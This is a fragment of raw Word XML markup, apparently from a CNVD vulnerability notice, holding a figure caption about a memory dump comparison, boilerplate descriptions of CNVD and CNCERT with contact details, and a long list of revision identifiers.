            <wp:extent cx="5140960" cy="3655060"/>
            <wp:effectExtent l="0" t="0" r="10160" b="2540"/>
            <wp:docPr id="1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0960" cy="365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15AE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jc w:val="center"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">图2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>DUMP 两窗口对比显示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF8492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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5260340" cy="2835275"/>
            <wp:effectExtent l="0" t="0" r="12700" b="14605"/>
            <wp:docPr id="1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83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5B466">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008080"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008080"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>关于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008080"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>CNVD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BFE636">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="480" w:firstLineChars="200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国家信息安全漏洞共享平台（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>China National Vulnerability Database</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，简称</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>CNVD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>）是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>CNCERT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>联合国内重要信息系统单位、基础电信运营商、网络安全厂商、软件厂商和互联网企业建立的国家网络安全漏洞库，致力于建立国家统一的信息安全漏洞收集、发布、验证、分析等应急处理体系。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3615EB52">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008080"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008080"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>关于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008080"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>CNCERT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2620E432">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="480" w:firstLineChars="200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国家计算机网络应急技术处理协调中心（简称“国家互联网应急中心”，英文简称是CNCERT或CNCERT/CC），成立于2002年9月，为非政府非盈利的网络安全技术中心，是我国网络安全应急体系的核心技术协调机构。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078D40F2">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="480" w:firstLineChars="200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作为国家级应急中心，CNCERT的主要职责是：按照“积极预防、及时发现、快速响应、力保恢复”的方针，开展互联网网络安全事件的预防、发现、预警和协调处置等工作，维护国家公共互联网安全，保障基础信息网络和重要信息系统的安全运行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6722B3B9">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="480" w:firstLineChars="200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网址：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>www.cert.org.cn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF87D4A">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="480" w:firstLineChars="200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邮箱：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>vreport@cert.org.cn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57945E50">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>电话：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>010-82991</w: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hidden="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1151890</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>165735</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5248275" cy="1290955"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="3" name="Rectangle 8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48275" cy="12909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6" o:spt="1" style="position:absolute;left:0pt;margin-left:90.7pt;margin-top:13.05pt;height:101.65pt;width:413.25pt;visibility:hidden;z-index:251659264;mso-width-relative:page;mso-height-relative:page;" fillcolor="#FFFFFF" filled="t" stroked="f" coordsize="21600,21600" o:gfxdata="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f91Yt2wAAAAsB&#10;AAAPAAAAAAAAAAEAIAAAACIAAABkcnMvZG93bnJldi54bWxQSwECFAAUAAAACACHTuJAa73NlBgC&#10;AABDBAAADgAAAAAAAAABACAAAAAqAQAAZHJzL2Uyb0RvYy54bWxQSwUGAAAAAAYABgBZAQAAtAUA&#10;AAAA&#10;">
                <v:fill on="t" focussize="0,0"/>
                <v:stroke on="f"/>
                <v:imagedata o:title=""/>
                <o:lock v:ext="edit" aspectratio="f"/>
                <v:textbox inset="1.016mm,1.016mm,1.016mm,1.016mm"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>783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方正黑体简体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Y4NTQzZTliYzkyZjJhOGRkZTM5NjA0OWFiY2UyN2IifQ=="/>
    <w:docVar w:name="KSO_WPS_MARK_KEY" w:val="1a2ada88-ddd0-4e1c-b462-3d4c66509e94"/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00F01B8B"/>
    <w:rsid w:val="00000717"/>
    <w:rsid w:val="0000134D"/>
    <w:rsid w:val="00001B43"/>
    <w:rsid w:val="0000364F"/>
    <w:rsid w:val="00003697"/>
    <w:rsid w:val="0000573B"/>
    <w:rsid w:val="00007868"/>
    <w:rsid w:val="00011DFF"/>
    <w:rsid w:val="00012492"/>
    <w:rsid w:val="000126D1"/>
    <w:rsid w:val="00012AD6"/>
    <w:rsid w:val="00013896"/>
    <w:rsid w:val="00013AEC"/>
    <w:rsid w:val="00013BC8"/>
    <w:rsid w:val="00014506"/>
    <w:rsid w:val="000151F4"/>
    <w:rsid w:val="00015F6A"/>
    <w:rsid w:val="000169D5"/>
    <w:rsid w:val="00017959"/>
    <w:rsid w:val="000206BF"/>
    <w:rsid w:val="00020F14"/>
    <w:rsid w:val="00024806"/>
    <w:rsid w:val="00025A6E"/>
    <w:rsid w:val="00026FCD"/>
    <w:rsid w:val="000330BF"/>
    <w:rsid w:val="00033767"/>
    <w:rsid w:val="0003689B"/>
    <w:rsid w:val="00040E69"/>
    <w:rsid w:val="00042540"/>
    <w:rsid w:val="0004548E"/>
    <w:rsid w:val="00045E41"/>
    <w:rsid w:val="00047429"/>
    <w:rsid w:val="000511C9"/>
    <w:rsid w:val="00051A6B"/>
    <w:rsid w:val="00051D4C"/>
    <w:rsid w:val="000520FC"/>
    <w:rsid w:val="000524C1"/>
    <w:rsid w:val="00052810"/>
    <w:rsid w:val="00054E2D"/>
    <w:rsid w:val="00054F40"/>
    <w:rsid w:val="000555CB"/>
    <w:rsid w:val="000563C1"/>
    <w:rsid w:val="000570E3"/>
    <w:rsid w:val="00057BC5"/>
    <w:rsid w:val="000613E5"/>
    <w:rsid w:val="000616D4"/>
    <w:rsid w:val="00061FF6"/>
    <w:rsid w:val="00063238"/>
    <w:rsid w:val="00064147"/>
    <w:rsid w:val="00065D73"/>
    <w:rsid w:val="00065EEC"/>
    <w:rsid w:val="000675CE"/>
    <w:rsid w:val="00067694"/>
    <w:rsid w:val="00067AED"/>
    <w:rsid w:val="00067B0D"/>
    <w:rsid w:val="00071AE5"/>
    <w:rsid w:val="00072266"/>
    <w:rsid w:val="00074CCB"/>
    <w:rsid w:val="0007523A"/>
    <w:rsid w:val="00075AAB"/>
    <w:rsid w:val="00076BB3"/>
    <w:rsid w:val="00076CC1"/>
    <w:rsid w:val="00076F9D"/>
    <w:rsid w:val="00077FE8"/>
    <w:rsid w:val="00080E01"/>
    <w:rsid w:val="00081728"/>
    <w:rsid w:val="000817F7"/>
    <w:rsid w:val="0008324F"/>
    <w:rsid w:val="00084A31"/>
    <w:rsid w:val="00085126"/>
    <w:rsid w:val="00085A64"/>
    <w:rsid w:val="00085DA3"/>
    <w:rsid w:val="00086D58"/>
    <w:rsid w:val="00086FE3"/>
    <w:rsid w:val="00091735"/>
    <w:rsid w:val="00091C76"/>
    <w:rsid w:val="00092B2E"/>
    <w:rsid w:val="00093093"/>
    <w:rsid w:val="000936AD"/>
    <w:rsid w:val="00094067"/>
    <w:rsid w:val="0009411E"/>
    <w:rsid w:val="00094664"/>
    <w:rsid w:val="00095934"/>
    <w:rsid w:val="00097053"/>
    <w:rsid w:val="000973C3"/>
    <w:rsid w:val="000A0175"/>
    <w:rsid w:val="000A13AC"/>
    <w:rsid w:val="000A2F2B"/>
    <w:rsid w:val="000A3914"/>
    <w:rsid w:val="000A4306"/>
    <w:rsid w:val="000A44D3"/>
    <w:rsid w:val="000A58A3"/>
    <w:rsid w:val="000A6797"/>
    <w:rsid w:val="000A74F5"/>
    <w:rsid w:val="000B0E6B"/>
    <w:rsid w:val="000B161F"/>
    <w:rsid w:val="000B1C9D"/>
    <w:rsid w:val="000B258E"/>
    <w:rsid w:val="000B2DC2"/>
    <w:rsid w:val="000B3143"/>
    <w:rsid w:val="000B3515"/>
    <w:rsid w:val="000B43CE"/>
    <w:rsid w:val="000B46A1"/>
    <w:rsid w:val="000B488E"/>
    <w:rsid w:val="000B5379"/>
    <w:rsid w:val="000B5928"/>
    <w:rsid w:val="000B614A"/>
    <w:rsid w:val="000B678B"/>
    <w:rsid w:val="000C12C2"/>
    <w:rsid w:val="000C1A98"/>
    <w:rsid w:val="000C2851"/>
    <w:rsid w:val="000C2B29"/>
    <w:rsid w:val="000C3524"/>
    <w:rsid w:val="000C663D"/>
    <w:rsid w:val="000C77A7"/>
    <w:rsid w:val="000C7BDB"/>
    <w:rsid w:val="000C7C64"/>
    <w:rsid w:val="000D0097"/>
    <w:rsid w:val="000D0F4D"/>
    <w:rsid w:val="000D1342"/>
    <w:rsid w:val="000D1D77"/>
    <w:rsid w:val="000D1E24"/>
    <w:rsid w:val="000D28CC"/>
    <w:rsid w:val="000D3440"/>
    <w:rsid w:val="000D39BB"/>
    <w:rsid w:val="000D765D"/>
    <w:rsid w:val="000E1D33"/>
    <w:rsid w:val="000E24F2"/>
    <w:rsid w:val="000E2804"/>
    <w:rsid w:val="000E48CF"/>
    <w:rsid w:val="000E5768"/>
    <w:rsid w:val="000E676C"/>
    <w:rsid w:val="000F0616"/>
    <w:rsid w:val="000F29EC"/>
    <w:rsid w:val="000F4651"/>
    <w:rsid w:val="000F5ED4"/>
    <w:rsid w:val="000F6016"/>
    <w:rsid w:val="000F6A88"/>
    <w:rsid w:val="0010084F"/>
    <w:rsid w:val="00100F14"/>
    <w:rsid w:val="00101DBA"/>
    <w:rsid w:val="00103CB6"/>
    <w:rsid w:val="00103CFC"/>
    <w:rsid w:val="00104148"/>
    <w:rsid w:val="00105769"/>
    <w:rsid w:val="0010613E"/>
    <w:rsid w:val="001062A9"/>
    <w:rsid w:val="0010721D"/>
    <w:rsid w:val="00110721"/>
    <w:rsid w:val="00112020"/>
    <w:rsid w:val="00112B04"/>
    <w:rsid w:val="00112D74"/>
    <w:rsid w:val="00112F01"/>
    <w:rsid w:val="00113879"/>
    <w:rsid w:val="00115D49"/>
    <w:rsid w:val="00116A13"/>
    <w:rsid w:val="00117321"/>
    <w:rsid w:val="001218F8"/>
    <w:rsid w:val="00121980"/>
    <w:rsid w:val="00121F89"/>
    <w:rsid w:val="00123555"/>
    <w:rsid w:val="00125CE9"/>
    <w:rsid w:val="001263CB"/>
    <w:rsid w:val="00126C8D"/>
    <w:rsid w:val="00127608"/>
    <w:rsid w:val="00127F06"/>
    <w:rsid w:val="001308E0"/>
    <w:rsid w:val="00131113"/>
    <w:rsid w:val="00131425"/>
    <w:rsid w:val="00131BE0"/>
    <w:rsid w:val="0013250D"/>
    <w:rsid w:val="001337D2"/>
    <w:rsid w:val="00133E09"/>
    <w:rsid w:val="00134757"/>
    <w:rsid w:val="00134FBA"/>
    <w:rsid w:val="00137760"/>
    <w:rsid w:val="00141885"/>
    <w:rsid w:val="00142B39"/>
    <w:rsid w:val="0014319F"/>
    <w:rsid w:val="00150299"/>
    <w:rsid w:val="00150308"/>
    <w:rsid w:val="001507B8"/>
    <w:rsid w:val="00151DE6"/>
    <w:rsid w:val="00151EE2"/>
    <w:rsid w:val="001529A3"/>
    <w:rsid w:val="0015434D"/>
    <w:rsid w:val="0015554A"/>
    <w:rsid w:val="001557A0"/>
    <w:rsid w:val="00160A6C"/>
    <w:rsid w:val="00160A7F"/>
    <w:rsid w:val="00161818"/>
    <w:rsid w:val="00163B32"/>
    <w:rsid w:val="001644FB"/>
    <w:rsid w:val="0016521A"/>
    <w:rsid w:val="001664A1"/>
    <w:rsid w:val="00166B2C"/>
    <w:rsid w:val="00170FE8"/>
    <w:rsid w:val="00171FE1"/>
    <w:rsid w:val="0017237B"/>
    <w:rsid w:val="00172B25"/>
    <w:rsid w:val="00175113"/>
    <w:rsid w:val="00175957"/>
    <w:rsid w:val="00180634"/>
    <w:rsid w:val="001806ED"/>
    <w:rsid w:val="00180C0F"/>
    <w:rsid w:val="001814B8"/>
    <w:rsid w:val="00181B43"/>
    <w:rsid w:val="001836AA"/>
    <w:rsid w:val="00186FDD"/>
    <w:rsid w:val="0018747E"/>
    <w:rsid w:val="00187887"/>
    <w:rsid w:val="001903F7"/>
    <w:rsid w:val="00192997"/>
    <w:rsid w:val="00192EB6"/>
    <w:rsid w:val="0019527C"/>
    <w:rsid w:val="00196453"/>
    <w:rsid w:val="00196998"/>
    <w:rsid w:val="00197039"/>
    <w:rsid w:val="001A078D"/>
    <w:rsid w:val="001A08A0"/>
    <w:rsid w:val="001A221F"/>
    <w:rsid w:val="001A25BD"/>
    <w:rsid w:val="001A2E0E"/>
    <w:rsid w:val="001A32CC"/>
    <w:rsid w:val="001A3805"/>
    <w:rsid w:val="001A3C52"/>
    <w:rsid w:val="001A3C69"/>
    <w:rsid w:val="001A3EBC"/>
    <w:rsid w:val="001A3FAB"/>
    <w:rsid w:val="001A4168"/>
    <w:rsid w:val="001A43A5"/>
    <w:rsid w:val="001A5420"/>
    <w:rsid w:val="001A5D71"/>
    <w:rsid w:val="001A7045"/>
    <w:rsid w:val="001B242D"/>
    <w:rsid w:val="001B2D1E"/>
    <w:rsid w:val="001B444A"/>
    <w:rsid w:val="001B739A"/>
    <w:rsid w:val="001C1320"/>
    <w:rsid w:val="001C3274"/>
    <w:rsid w:val="001C3BE9"/>
    <w:rsid w:val="001C5C79"/>
    <w:rsid w:val="001C7EC9"/>
    <w:rsid w:val="001D00DB"/>
    <w:rsid w:val="001D1B1C"/>
    <w:rsid w:val="001D1CB0"/>
    <w:rsid w:val="001D2DDF"/>
    <w:rsid w:val="001D3005"/>
    <w:rsid w:val="001D32F5"/>
    <w:rsid w:val="001D32FF"/>
    <w:rsid w:val="001D3816"/>
    <w:rsid w:val="001D6A90"/>
    <w:rsid w:val="001D6C3C"/>
    <w:rsid w:val="001E1ED1"/>
    <w:rsid w:val="001E2366"/>
    <w:rsid w:val="001E32D5"/>
    <w:rsid w:val="001E334F"/>
    <w:rsid w:val="001E364C"/>
    <w:rsid w:val="001E4532"/>
    <w:rsid w:val="001E4A2E"/>
    <w:rsid w:val="001E6A75"/>
    <w:rsid w:val="001F06AA"/>
    <w:rsid w:val="001F14C0"/>
    <w:rsid w:val="001F16B7"/>
    <w:rsid w:val="001F2FDC"/>
    <w:rsid w:val="001F4117"/>
    <w:rsid w:val="001F4CF3"/>
    <w:rsid w:val="001F5738"/>
    <w:rsid w:val="001F5D0D"/>
    <w:rsid w:val="001F6C49"/>
    <w:rsid w:val="001F6FCA"/>
    <w:rsid w:val="001F7491"/>
    <w:rsid w:val="001F7D77"/>
    <w:rsid w:val="00200D72"/>
    <w:rsid w:val="00201C2F"/>
    <w:rsid w:val="0020235D"/>
    <w:rsid w:val="00202E4F"/>
    <w:rsid w:val="00203159"/>
    <w:rsid w:val="00203ACD"/>
    <w:rsid w:val="00203EF4"/>
    <w:rsid w:val="00204F11"/>
    <w:rsid w:val="00207229"/>
    <w:rsid w:val="00210586"/>
    <w:rsid w:val="00210706"/>
    <w:rsid w:val="00210964"/>
    <w:rsid w:val="00211062"/>
    <w:rsid w:val="00211663"/>
    <w:rsid w:val="0021196C"/>
    <w:rsid w:val="002121F7"/>
    <w:rsid w:val="002123C1"/>
    <w:rsid w:val="002132AD"/>
    <w:rsid w:val="0021376C"/>
    <w:rsid w:val="00213B1E"/>
    <w:rsid w:val="002163E9"/>
    <w:rsid w:val="002215BC"/>
    <w:rsid w:val="00221AC2"/>
    <w:rsid w:val="00221C9C"/>
    <w:rsid w:val="00222B01"/>
    <w:rsid w:val="00222BE2"/>
    <w:rsid w:val="00224913"/>
    <w:rsid w:val="00225ADA"/>
    <w:rsid w:val="00226A91"/>
    <w:rsid w:val="00227439"/>
    <w:rsid w:val="00227E1E"/>
    <w:rsid w:val="00231516"/>
    <w:rsid w:val="00231F6D"/>
    <w:rsid w:val="00232CDA"/>
    <w:rsid w:val="002331D1"/>
    <w:rsid w:val="00233401"/>
    <w:rsid w:val="002349BB"/>
    <w:rsid w:val="00234E34"/>
    <w:rsid w:val="00234F20"/>
    <w:rsid w:val="00234F38"/>
    <w:rsid w:val="00235B85"/>
    <w:rsid w:val="00235E07"/>
    <w:rsid w:val="00240C97"/>
    <w:rsid w:val="00243DB0"/>
    <w:rsid w:val="0024556E"/>
    <w:rsid w:val="00246754"/>
    <w:rsid w:val="00247052"/>
    <w:rsid w:val="00247E97"/>
    <w:rsid w:val="00250A43"/>
    <w:rsid w:val="00251848"/>
    <w:rsid w:val="0025344A"/>
    <w:rsid w:val="00254708"/>
    <w:rsid w:val="00254DE7"/>
    <w:rsid w:val="00255A05"/>
    <w:rsid w:val="00256971"/>
    <w:rsid w:val="00256B46"/>
    <w:rsid w:val="00257A16"/>
    <w:rsid w:val="00257B72"/>
    <w:rsid w:val="00261AEB"/>
    <w:rsid w:val="00265A83"/>
    <w:rsid w:val="00266D3D"/>
    <w:rsid w:val="00267B3E"/>
    <w:rsid w:val="002700AA"/>
    <w:rsid w:val="00271B79"/>
    <w:rsid w:val="00271BC1"/>
    <w:rsid w:val="0027332F"/>
    <w:rsid w:val="00273550"/>
    <w:rsid w:val="00275A91"/>
    <w:rsid w:val="00275D15"/>
    <w:rsid w:val="00276906"/>
    <w:rsid w:val="00276939"/>
    <w:rsid w:val="0027758D"/>
    <w:rsid w:val="00280BD0"/>
    <w:rsid w:val="00281F91"/>
    <w:rsid w:val="00282E26"/>
    <w:rsid w:val="002834AD"/>
    <w:rsid w:val="002851F5"/>
    <w:rsid w:val="002866D0"/>
    <w:rsid w:val="002867BF"/>
    <w:rsid w:val="0028692A"/>
    <w:rsid w:val="00287714"/>
    <w:rsid w:val="00290E31"/>
    <w:rsid w:val="00290EB0"/>
    <w:rsid w:val="002910B4"/>
    <w:rsid w:val="00291ADE"/>
    <w:rsid w:val="00292598"/>
    <w:rsid w:val="00293423"/>
    <w:rsid w:val="002936AC"/>
    <w:rsid w:val="002942CC"/>
    <w:rsid w:val="0029498A"/>
    <w:rsid w:val="00294A26"/>
    <w:rsid w:val="00297CF8"/>
    <w:rsid w:val="002A003A"/>
    <w:rsid w:val="002A23EA"/>
    <w:rsid w:val="002A3C84"/>
    <w:rsid w:val="002A5652"/>
    <w:rsid w:val="002A6FE3"/>
    <w:rsid w:val="002B12BD"/>
    <w:rsid w:val="002B18A4"/>
    <w:rsid w:val="002B2874"/>
    <w:rsid w:val="002B3F00"/>
    <w:rsid w:val="002B43F0"/>
    <w:rsid w:val="002B46AE"/>
    <w:rsid w:val="002B4CCB"/>
    <w:rsid w:val="002B5F8A"/>
    <w:rsid w:val="002B6C3F"/>
    <w:rsid w:val="002B75F6"/>
    <w:rsid w:val="002C0235"/>
    <w:rsid w:val="002C11F8"/>
    <w:rsid w:val="002C1477"/>
    <w:rsid w:val="002C2C9C"/>
    <w:rsid w:val="002C5464"/>
    <w:rsid w:val="002C5B05"/>
    <w:rsid w:val="002C5BFC"/>
    <w:rsid w:val="002C6D60"/>
    <w:rsid w:val="002C70D6"/>
    <w:rsid w:val="002C7F2D"/>
    <w:rsid w:val="002C7F78"/>
    <w:rsid w:val="002D0197"/>
    <w:rsid w:val="002D2025"/>
    <w:rsid w:val="002D2068"/>
    <w:rsid w:val="002D219D"/>
    <w:rsid w:val="002D2507"/>
    <w:rsid w:val="002D30F1"/>
    <w:rsid w:val="002D51D9"/>
    <w:rsid w:val="002D79C7"/>
    <w:rsid w:val="002D7CC6"/>
    <w:rsid w:val="002D7F78"/>
    <w:rsid w:val="002E0059"/>
    <w:rsid w:val="002E4E39"/>
    <w:rsid w:val="002E510D"/>
    <w:rsid w:val="002E5B50"/>
    <w:rsid w:val="002E5D63"/>
    <w:rsid w:val="002F06B4"/>
    <w:rsid w:val="002F269F"/>
    <w:rsid w:val="002F2BE7"/>
    <w:rsid w:val="002F4F30"/>
    <w:rsid w:val="002F5BDE"/>
    <w:rsid w:val="002F7565"/>
    <w:rsid w:val="002F7EC2"/>
    <w:rsid w:val="002F7F26"/>
    <w:rsid w:val="00300385"/>
    <w:rsid w:val="00301525"/>
    <w:rsid w:val="00301567"/>
    <w:rsid w:val="00301EB2"/>
    <w:rsid w:val="00303C29"/>
    <w:rsid w:val="00303CF5"/>
    <w:rsid w:val="00303FA5"/>
    <w:rsid w:val="00304EE2"/>
    <w:rsid w:val="0030594B"/>
    <w:rsid w:val="003104FB"/>
    <w:rsid w:val="00311127"/>
    <w:rsid w:val="003142D0"/>
    <w:rsid w:val="0031485E"/>
    <w:rsid w:val="00314BFB"/>
    <w:rsid w:val="00316225"/>
    <w:rsid w:val="00316587"/>
    <w:rsid w:val="00316ECA"/>
    <w:rsid w:val="00317531"/>
    <w:rsid w:val="00317E67"/>
    <w:rsid w:val="003209E5"/>
    <w:rsid w:val="003215D9"/>
    <w:rsid w:val="00321902"/>
    <w:rsid w:val="00321ED2"/>
    <w:rsid w:val="00322B27"/>
    <w:rsid w:val="0032476E"/>
    <w:rsid w:val="00325C93"/>
    <w:rsid w:val="003301D8"/>
    <w:rsid w:val="003308B8"/>
    <w:rsid w:val="00330A87"/>
    <w:rsid w:val="00330DE4"/>
    <w:rsid w:val="00330FCD"/>
    <w:rsid w:val="00331651"/>
    <w:rsid w:val="00333C39"/>
    <w:rsid w:val="00334288"/>
    <w:rsid w:val="003342A8"/>
    <w:rsid w:val="00334DFF"/>
    <w:rsid w:val="0033530E"/>
    <w:rsid w:val="00337024"/>
    <w:rsid w:val="0034054A"/>
    <w:rsid w:val="00340EED"/>
    <w:rsid w:val="00342827"/>
    <w:rsid w:val="0034480B"/>
    <w:rsid w:val="00346079"/>
    <w:rsid w:val="003460A2"/>
    <w:rsid w:val="0035238E"/>
    <w:rsid w:val="00352B8B"/>
    <w:rsid w:val="00352BC1"/>
    <w:rsid w:val="00353DC7"/>
    <w:rsid w:val="00353F97"/>
    <w:rsid w:val="00356877"/>
    <w:rsid w:val="00357070"/>
    <w:rsid w:val="003571E5"/>
    <w:rsid w:val="00361EA5"/>
    <w:rsid w:val="00366B56"/>
    <w:rsid w:val="003670E7"/>
    <w:rsid w:val="0036745C"/>
    <w:rsid w:val="00370E27"/>
    <w:rsid w:val="00370E3A"/>
    <w:rsid w:val="00371D2D"/>
    <w:rsid w:val="00373DF8"/>
    <w:rsid w:val="0037574E"/>
    <w:rsid w:val="00376128"/>
    <w:rsid w:val="00377537"/>
    <w:rsid w:val="003776D8"/>
    <w:rsid w:val="00381700"/>
    <w:rsid w:val="003817A5"/>
    <w:rsid w:val="00382E52"/>
    <w:rsid w:val="00384672"/>
    <w:rsid w:val="00384C25"/>
    <w:rsid w:val="003854F9"/>
    <w:rsid w:val="00385594"/>
    <w:rsid w:val="003866B2"/>
    <w:rsid w:val="00386701"/>
    <w:rsid w:val="00386CF4"/>
    <w:rsid w:val="00387CA7"/>
    <w:rsid w:val="00390DC5"/>
    <w:rsid w:val="00391A0B"/>
    <w:rsid w:val="00391CCC"/>
    <w:rsid w:val="00394581"/>
    <w:rsid w:val="00394B20"/>
    <w:rsid w:val="003953B9"/>
    <w:rsid w:val="00397D21"/>
    <w:rsid w:val="003A0296"/>
    <w:rsid w:val="003A02C5"/>
    <w:rsid w:val="003A0855"/>
    <w:rsid w:val="003A1044"/>
    <w:rsid w:val="003A2A79"/>
    <w:rsid w:val="003A5364"/>
    <w:rsid w:val="003A61AF"/>
    <w:rsid w:val="003A6375"/>
    <w:rsid w:val="003A652D"/>
    <w:rsid w:val="003A7763"/>
    <w:rsid w:val="003A7A5E"/>
    <w:rsid w:val="003A7DA9"/>
    <w:rsid w:val="003B03F1"/>
    <w:rsid w:val="003B2E97"/>
    <w:rsid w:val="003B2FAD"/>
    <w:rsid w:val="003B2FC5"/>
    <w:rsid w:val="003B3412"/>
    <w:rsid w:val="003B3448"/>
    <w:rsid w:val="003B402D"/>
    <w:rsid w:val="003B4447"/>
    <w:rsid w:val="003B6C9B"/>
    <w:rsid w:val="003B6D3C"/>
    <w:rsid w:val="003B6F82"/>
    <w:rsid w:val="003B761C"/>
    <w:rsid w:val="003B7F3E"/>
    <w:rsid w:val="003C0691"/>
    <w:rsid w:val="003C071A"/>
    <w:rsid w:val="003C1118"/>
    <w:rsid w:val="003C2720"/>
    <w:rsid w:val="003C34CD"/>
    <w:rsid w:val="003C4F92"/>
    <w:rsid w:val="003C59BF"/>
    <w:rsid w:val="003C6987"/>
    <w:rsid w:val="003C7615"/>
    <w:rsid w:val="003D22DE"/>
    <w:rsid w:val="003D3640"/>
    <w:rsid w:val="003D4F1F"/>
    <w:rsid w:val="003D4FB1"/>
    <w:rsid w:val="003E046D"/>
    <w:rsid w:val="003E055F"/>
    <w:rsid w:val="003E0642"/>
    <w:rsid w:val="003E0871"/>
    <w:rsid w:val="003E1797"/>
    <w:rsid w:val="003E1810"/>
    <w:rsid w:val="003E435E"/>
    <w:rsid w:val="003E4B1A"/>
    <w:rsid w:val="003E5C59"/>
